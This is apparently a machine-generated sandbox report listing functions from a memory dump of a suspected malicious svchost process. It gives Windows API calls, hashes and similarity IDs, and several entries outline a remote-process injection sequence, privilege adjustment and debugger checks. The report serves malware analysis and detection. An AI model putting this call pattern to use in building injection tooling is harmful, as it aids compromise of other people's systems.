                                                                                                                                                                                • Opcode Fuzzy Hash: 51ed73a0fe790b9dd92d53e1637baf4121573ec2e986ea361f53db6b8728750e
                                                                                                                                                                                • Instruction Fuzzy Hash: 86F0DA75740259BBF714EB90CD46FFDB77CAB10748F600074EB01BA1D4E7B4AA049625
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 131453DC: GetEnvironmentVariableA.KERNEL32(-00000004,0000002B,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 131453FC
                                                                                                                                                                                  • Part of subcall function 131453DC: PathAddBackslashA.KERNELBASE(C:\Windows\system32\regedit.exe), ref: 13145407
                                                                                                                                                                                  • Part of subcall function 131453DC: PathAppendA.SHLWAPI(C:\Windows\system32\regedit.exe,-00000004,00000028), ref: 1314541C
                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000006,00000000,1314334E,00016B00,LoadLibraryExA,?), ref: 1314543F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Path$AppendBackslashCreateEnvironmentFileVariable
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2777513326-0
                                                                                                                                                                                • Opcode ID: 7952064c17b72f8ec2155692ee6dcf5d87db53bcce2995ed0505b70aa40820e9
                                                                                                                                                                                • Instruction ID: a0fb1ee771b706fa743988e8952bd7e380549e7e2bd202f0058836edd53182ad
                                                                                                                                                                                • Opcode Fuzzy Hash: 7952064c17b72f8ec2155692ee6dcf5d87db53bcce2995ed0505b70aa40820e9
                                                                                                                                                                                • Instruction Fuzzy Hash: B2C048A8BA1250BEFE6C1B309D5FF2B1A1C8701A02F38466CB202E8880BAD4A9108420
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCommandLineA.KERNEL32(?,?,?,76B7EA30,00000000,00000000), ref: 1314526F
                                                                                                                                                                                • StrStrA.SHLWAPI(00000001,131413B8,?,?,?,76B7EA30,00000000,00000000), ref: 13145283
                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,1315CA60,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 131452BE
                                                                                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,1314DFF7,00003000,00000040,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000), ref: 131452DC
                                                                                                                                                                                • TerminateProcess.KERNEL32(?,00000000,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000,00000000), ref: 131452ED
                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,76B7EA30,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000), ref: 1314533F
                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,76B7EA30,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000), ref: 13145391
                                                                                                                                                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 131453B7
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000,00000000), ref: 131453C1
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000,00000000), ref: 131453CA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CreateMemoryWrite$AllocCloseCommandErrorHandleLastLineRemoteTerminateThreadVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3159359046-0
                                                                                                                                                                                • Opcode ID: cb27e68a1366bd1c7a15728748c4f030c67abe268d62b82968b91bc4d834542e
                                                                                                                                                                                • Instruction ID: 40287cfa9352fd9813010a6eba85a288e5fe4e8efb125738b9c3a228331e7e3f
                                                                                                                                                                                • Opcode Fuzzy Hash: cb27e68a1366bd1c7a15728748c4f030c67abe268d62b82968b91bc4d834542e
                                                                                                                                                                                • Instruction Fuzzy Hash: 42512CB1A00249FFEB11DFA4CD84FAEBBB8EF08744F244469F905E6541E774AA41CB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GdipAlloc.GDIPLUS(00000008,131475F5,00000000,?), ref: 1314F313
                                                                                                                                                                                • GdipAlloc.GDIPLUS(00000008), ref: 1314F35C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocGdip
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1856340535-0
                                                                                                                                                                                • Opcode ID: 90cc83d8c346803ce5d403663a43de7c397794622860fffed05550019d7aa2dd
                                                                                                                                                                                • Instruction ID: f81b496d3d4300cab5010031e0854b99c83db3e085879ea78633854ed2d0f7ab
                                                                                                                                                                                • Opcode Fuzzy Hash: 90cc83d8c346803ce5d403663a43de7c397794622860fffed05550019d7aa2dd
                                                                                                                                                                                • Instruction Fuzzy Hash: E8518179E44205ABDF05DFA89844AEEB7B6EFC8310F39847AE014B7280DF745A55CB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bbc7349435e139cfeef1376e6739cf2ae13f3e437ece28969fa09ac7905dc2d9
                                                                                                                                                                                • Instruction ID: 82b58193247f83d9378ca0673a6d56451d2239e8431305cbf597a27a676d069a
                                                                                                                                                                                • Opcode Fuzzy Hash: bbc7349435e139cfeef1376e6739cf2ae13f3e437ece28969fa09ac7905dc2d9
                                                                                                                                                                                • Instruction Fuzzy Hash: 309139726403159FE728DF7CCC90ABA77AAFB44304F25052AFA25A7180DB75EC858B60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 13153DB0
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 13153DC5
                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(13142210), ref: 13153DD0
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 13153DEC
                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 13153DF3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                                                                • Opcode ID: bf21c57754bc23f7e2c6ce65f547fa5cbad6aae5547101e61787ace11ae8811a
                                                                                                                                                                                • Instruction ID: 4336d6d148fa358db4926c868d668893fab4dfed7503a4ed23d217601b250cef
                                                                                                                                                                                • Opcode Fuzzy Hash: bf21c57754bc23f7e2c6ce65f547fa5cbad6aae5547101e61787ace11ae8811a
                                                                                                                                                                                • Instruction Fuzzy Hash: AE21E3B5900326EFD36ADF28D5E4A443BB8FB4970CF10842EF618C3242E7B559818FA5
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • OpenProcessToken.ADVAPI32(000000FF,00000028,00000000), ref: 13145181
                                                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,-00000004,000000C0), ref: 131451A6
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 131451B3
                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,?,1314521A), ref: 131451E5
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 131451EB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Token$AdjustCloseErrorHandleLastLookupOpenPrivilegePrivilegesProcessValue
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 379965542-0
                                                                                                                                                                                • Opcode ID: 38711aaf368b1f886249a48ed627c8ddb5286af99ca2571e7505373946fc1082
                                                                                                                                                                                • Instruction ID: 841742b94ca0d797a0f95ef85008fab51459c9a4e867e51777ba22eb5f869667
                                                                                                                                                                                • Opcode Fuzzy Hash: 38711aaf368b1f886249a48ed627c8ddb5286af99ca2571e7505373946fc1082
                                                                                                                                                                                • Instruction Fuzzy Hash: 2D010CB5A50259EFEB00EFA5CD49FEEBBBCFB04709F200125E516E6180E7749A448B60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • _strcpy_s.LIBCMT ref: 13153009
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 1315301A
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,1468EFF1,00000104), ref: 13153036
                                                                                                                                                                                • _strcpy_s.LIBCMT ref: 1315304B
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 1315305E
                                                                                                                                                                                • _strlen.LIBCMT ref: 13153067
                                                                                                                                                                                • _strlen.LIBCMT ref: 13153074
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 131530A1
                                                                                                                                                                                • _strcat_s.LIBCMT ref: 131530B4
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 131530C5
                                                                                                                                                                                • _strcat_s.LIBCMT ref: 131530D6
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 131530E7
                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F4,?,?,00000000,775D4620,00000003,13153169,000000FC,13152892,00000001,00000000,00000000,?,13152F22,?,00000001), ref: 13153106
                                                                                                                                                                                • _strlen.LIBCMT ref: 13153127
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13153131
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                                                                                                                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                                                • API String ID: 1879448924-4022980321
                                                                                                                                                                                • Opcode ID: 5ab5c7964740bc4e51b703f1b72183d174035eccb5bd8cb166ad743aad93f6d6
                                                                                                                                                                                • Instruction ID: 71e9ea7125f5ba385c0fd206275b0b2c2d91dcd27c7c62f4855ec8eb608d34f2
                                                                                                                                                                                • Opcode Fuzzy Hash: 5ab5c7964740bc4e51b703f1b72183d174035eccb5bd8cb166ad743aad93f6d6
                                                                                                                                                                                • Instruction Fuzzy Hash: 6631446BB403153BEA1263788D80FAB760C9B27294F1A0935FD79E20C2EF15E55281F2
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 13154BE4
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 13154C00
                                                                                                                                                                                  • Part of subcall function 131529B0: TlsGetValue.KERNEL32(00000000,13152A25,00000000,13154BC5,00000000,00000000,00000314,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529BD
                                                                                                                                                                                  • Part of subcall function 131529B0: TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529D4
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 13154C1D
                                                                                                                                                                                  • Part of subcall function 131529B0: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529E9
                                                                                                                                                                                  • Part of subcall function 131529B0: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 13152A04
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 13154C32
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 13154C53
                                                                                                                                                                                  • Part of subcall function 13152275: _memset.LIBCMT ref: 13152301
                                                                                                                                                                                  • Part of subcall function 13152275: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 1315231F
                                                                                                                                                                                  • Part of subcall function 13152275: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 13152329
                                                                                                                                                                                  • Part of subcall function 13152275: UnhandledExceptionFilter.KERNEL32(1468EFD8,?,?,00000000), ref: 13152333
                                                                                                                                                                                  • Part of subcall function 13152275: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 1315234E
                                                                                                                                                                                  • Part of subcall function 13152275: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 13152355
                                                                                                                                                                                  • Part of subcall function 13152A27: TlsGetValue.KERNEL32(00000000,13153CE0,1315291D,?,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152A34
                                                                                                                                                                                  • Part of subcall function 13152A27: TlsGetValue.KERNEL32(FFFFFFFF,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?,?,?,131520D2,0000000E), ref: 13152A4B
                                                                                                                                                                                  • Part of subcall function 13152A27: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?,?,?,131520D2,0000000E), ref: 13152A60
                                                                                                                                                                                  • Part of subcall function 13152A27: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 13152A7B
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 13154C67
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 13154C7F
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 13154CF2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                                                                                                                                                                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                                                                                • API String ID: 2940365033-232180764
                                                                                                                                                                                • Opcode ID: 683eaacba4102a1eb4dc363de1f925a92a96b79eb5cb38d11469d49619cc89fc
                                                                                                                                                                                • Instruction ID: 797ac02a85cf84c673578637bf572b9012ab3e7df7b1b5423257380eddd92f02
                                                                                                                                                                                • Opcode Fuzzy Hash: 683eaacba4102a1eb4dc363de1f925a92a96b79eb5cb38d11469d49619cc89fc
                                                                                                                                                                                • Instruction Fuzzy Hash: 25418276B44326ABCF159FB48D849DE7BA8EB5A218F2A053EF524F3140DF3095819B60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00000000,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AE89
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,,,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AEBD
                                                                                                                                                                                • lstrcatA.KERNEL32(?,13141430,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AEC7
                                                                                                                                                                                • lstrcatA.KERNEL32(?,?,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AECF
                                                                                                                                                                                • lstrcatA.KERNEL32(?,1314142C,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AED9
                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AEE1
                                                                                                                                                                                • lstrcatA.KERNEL32(?,13141428,?,1314AFA8,00000000,1314C1F9,?,00000000,00000000,?,00000000), ref: 1314AEEB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcat$lstrlen
                                                                                                                                                                                • String ID: ,
                                                                                                                                                                                • API String ID: 751011610-1078660327
                                                                                                                                                                                • Opcode ID: d169b50414349bb80e0f2363606000599c73857c221df201a131f173bc6090c1
                                                                                                                                                                                • Instruction ID: 6b2f286e4c20a96009f5003c23213b964089748ed477d505c6b3864f21c3e750
                                                                                                                                                                                • Opcode Fuzzy Hash: d169b50414349bb80e0f2363606000599c73857c221df201a131f173bc6090c1
                                                                                                                                                                                • Instruction Fuzzy Hash: 36115E36A0022EAFDF109F64ED448DB3FA5EF44265B158436F818A6161DB31DD70DFA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,131569D8,0000000C,13152BD8,00000000,00000000,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7), ref: 13152AD8
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,EncodePointer), ref: 13152B0C
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,DecodePointer), ref: 13152B1C
                                                                                                                                                                                • InterlockedIncrement.KERNEL32(1315AD08), ref: 13152B3E
                                                                                                                                                                                • __lock.LIBCMT ref: 13152B46
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$HandleIncrementInterlockedModule__lock
                                                                                                                                                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                                                • API String ID: 3405995401-2843748187
                                                                                                                                                                                • Opcode ID: 0ebfb853b3c9a725648ceaf362da5c9cb03e476904d3f71c207ffbcfa6ae4b73
                                                                                                                                                                                • Instruction ID: 114cc0e96a9c543aa3415dd1b771016eafede95e5498370d30359c62934f7b08
                                                                                                                                                                                • Opcode Fuzzy Hash: 0ebfb853b3c9a725648ceaf362da5c9cb03e476904d3f71c207ffbcfa6ae4b73
                                                                                                                                                                                • Instruction Fuzzy Hash: CB114F76A007029FE7119F79C840BEABBF0BF06315F144929F8B597651DB34A502CF61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • DeleteCriticalSection.KERNEL32(00000000,00000000,1314D287,00000000,-00000008,00000000,00000000,1314DFF7,00000000,00000000,76B7EA30,1314E1F5,00000000), ref: 13143438
                                                                                                                                                                                • DeleteCriticalSection.KERNEL32 ref: 13143448
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 13143459
                                                                                                                                                                                • OpenThread.KERNEL32(00000001,00000000,00000000), ref: 13143478
                                                                                                                                                                                • TerminateThread.KERNEL32(00000000,00000000), ref: 13143486
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1314348D
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 13143498
                                                                                                                                                                                • ExitThread.KERNEL32 ref: 131434A8
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 131434B1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Thread$CriticalDeleteExitSection$CloseCurrentHandleOpenProcessSleepTerminate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3126711353-0
                                                                                                                                                                                • Opcode ID: 6574907d64a1d9367c674465d6f8eb0d2fac05f8a3635993c3481088b0551f84
                                                                                                                                                                                • Instruction ID: 7e6c1805d5825ce401789290188eb31f8bcae88a10db01c7d1f936579a7b304f
                                                                                                                                                                                • Opcode Fuzzy Hash: 6574907d64a1d9367c674465d6f8eb0d2fac05f8a3635993c3481088b0551f84
                                                                                                                                                                                • Instruction Fuzzy Hash: 78018FB1500274AFD305BFA2DEC899A7AA9EB05249B194835F90693204C7784844CBB1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5b9f829e16154930bc2954237f6e26f5f5f23b2ef4cecea46de922ead4a31093
                                                                                                                                                                                • Instruction ID: 8e175b1d4d2de08a9392ba79f4480ab7675722e82d98283b35c2b2a6d327951d
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b9f829e16154930bc2954237f6e26f5f5f23b2ef4cecea46de922ead4a31093
                                                                                                                                                                                • Instruction Fuzzy Hash: E341D871704356EBD7009A76CF41FAE3A5DDF406BCF784E22B821E51D4EB70E4868961
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick
                                                                                                                                                                                • String ID: L'
                                                                                                                                                                                • API String ID: 536389180-3089082269
                                                                                                                                                                                • Opcode ID: b0d7ee5c1280d99237a9c6e9605b0dc3947092799fc12b25058896235108e33f
                                                                                                                                                                                • Instruction ID: 7c7e04ce77545a9cc11d37c0786e132adab084c0dab7ed07bb1ed7d5527e31ad
                                                                                                                                                                                • Opcode Fuzzy Hash: b0d7ee5c1280d99237a9c6e9605b0dc3947092799fc12b25058896235108e33f
                                                                                                                                                                                • Instruction Fuzzy Hash: 83514175D00309FFCF14CF98C9848AEBBB9FF05354B34866AE569A7291D7309A81CB91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • StrStrA.SHLWAPI(?,1314CF84,00000000,00000000,?,1314CF83,?), ref: 13151ADD
                                                                                                                                                                                • StrStrA.SHLWAPI(00000002,131414B0), ref: 13151BBE
                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 13151BD3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                                • String ID: %$u
                                                                                                                                                                                • API String ID: 1659193697-272644364
                                                                                                                                                                                • Opcode ID: 237fb15521333dd449a51c2deaee052b922457626443852c1a191fed9155d609
                                                                                                                                                                                • Instruction ID: 7fc1a5fd04cb0a281c89f6f43f958382e6022d5a77df36bedc9fcfbd2a658804
                                                                                                                                                                                • Opcode Fuzzy Hash: 237fb15521333dd449a51c2deaee052b922457626443852c1a191fed9155d609
                                                                                                                                                                                • Instruction Fuzzy Hash: 3741A176A0024AAFDB02DF7C8D849AE7BB9EF16244B194578F855E7204E734EE04CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,131414A4,?,00000000,00000000,?,?), ref: 131504EE
                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,131414A4,00000000), ref: 13150525
                                                                                                                                                                                • StrStrA.SHLWAPI(00000001,131414A4), ref: 13150551
                                                                                                                                                                                • StrStrA.SHLWAPI(?,131414A4), ref: 13150584
                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,131413B0), ref: 1315059E
                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,131414A0), ref: 131505AA
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 131505CF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wnsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 167729887-0
                                                                                                                                                                                • Opcode ID: 7f83c46f78e661f7be0bc2bc837c4aaa58e034de48d7764ff71b77eb413b34e2
                                                                                                                                                                                • Instruction ID: d40ca0711f350eafa9e00aa3d73cf48dafbe44b095db4083eda89839311fe2eb
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f83c46f78e661f7be0bc2bc837c4aaa58e034de48d7764ff71b77eb413b34e2
                                                                                                                                                                                • Instruction Fuzzy Hash: 7A61C035A01249BFDF014FA5CD40FAE3B6AAF87254F188039FC34AB290DB31D941DAA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • getSystemCP.LIBCMT ref: 131544C8
                                                                                                                                                                                  • Part of subcall function 13154435: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 13154442
                                                                                                                                                                                  • Part of subcall function 13154435: GetOEMCP.KERNEL32(00000000), ref: 1315445C
                                                                                                                                                                                • setSBCS.LIBCMT ref: 131544DA
                                                                                                                                                                                  • Part of subcall function 13154130: _memset.LIBCMT ref: 13154143
                                                                                                                                                                                • IsValidCodePage.KERNEL32(-00000030), ref: 13154520
